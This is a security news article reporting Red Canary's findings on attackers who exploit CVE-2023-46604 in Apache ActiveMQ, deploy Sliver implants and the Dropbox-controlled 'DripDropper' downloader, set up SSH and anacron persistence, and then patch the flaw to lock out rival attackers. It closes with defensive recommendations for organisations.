Red Canary’s Threat Intelligence team has uncovered a sophisticated adversarial campaign where attackers exploit CVE-2023-46604 in Apache ActiveMQ to gain persistent access on cloud Linux systems, then strategically patch the exploited vulnerability to secure their foothold and evade detection from competing threat actors.
Advanced Post-Exploitation Tactics
The campaign demonstrates counterintuitive behavior where adversaries “fix” compromised systems after gaining remote access.
This dual-purpose strategy effectively locks out competing adversaries while obscuring the initial access technique, showcasing advanced operational security considerations in modern cyber warfare.
Red Canary detected adversaries executing reconnaissance commands on dozens of cloud-based Linux endpoints vulnerable to the critical remote code execution vulnerability CVE-2023-46604 in Apache ActiveMQ.
This widely-deployed open source message broker has been previously exploited for deploying TellYouThePass, Ransomhub, and HelloKitty ransomware variants, alongside Kinsing cryptomining malware.
DripDropper Technical Analysis
The adversaries deployed a varied command and control infrastructure, including Sliver implants and Cloudflare Tunnels for covert long-term access.
After exploiting endpoints and installing Sliver implants, attackers modified existing SSH daemon configurations to enable root login capabilities, typically disabled by default in modern Linux distributions.
Under elevated SSH sessions, adversaries downloaded and executed a previously unknown downloader designated “DripDropper”.
This encrypted PyInstaller ELF file requires password authentication for execution, effectively hindering automated sandbox analysis.
DripDropper communicates with adversary-controlled Dropbox accounts using hardcoded bearer tokens, leveraging legitimate cloud platforms for command and control operations.
The malware establishes persistence by modifying anacron configuration files across /etc/cron.*/ directories and altering SSH configuration files, including changing the default login shell for the games user account to /bin/sh.
This modification prepares systems for additional persistent access vectors through seemingly innocuous user accounts.
Vulnerability Patching Strategy
Following initial compromise, adversaries downloaded legitimate ActiveMQ JAR files from Apache Maven repositories, constituting an official patch for CVE-2023-46604.
By replacing existing vulnerable JAR files, attackers effectively remediated the exploited vulnerability, reducing detection probability through vulnerability scanners and preventing exploitation by competing threat actors.
| Component | Technical Details |
|---|---|
| Vulnerability | CVE-2023-46604 (Apache ActiveMQ RCE) |
| EPSS Score | 94.44% exploitation probability (30 days) |
| Malware Type | Encrypted PyInstaller ELF |
| C2 Infrastructure | Dropbox, Sliver, Cloudflare Tunnels |
| Persistence Methods | SSH configuration modification, anacron scheduling |
| Target Environment | Cloud-based Linux endpoints |
Defensive Implications
This campaign underscores the sophistication of modern Linux-targeted operations, where adversaries implement multi-layered persistence mechanisms before self-remediating initial access vectors.
Organizations must implement policy-based SSH management, proactive vulnerability patching, network ingress controls, and comprehensive cloud logging to defend against such advanced persistent threats effectively.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
%20(1).webp?resize=1600,900&ssl=1&description=The campaign demonstrates counterintuitive behavior where adversaries "fix" compromised systems after gaining remote access.){kind=link}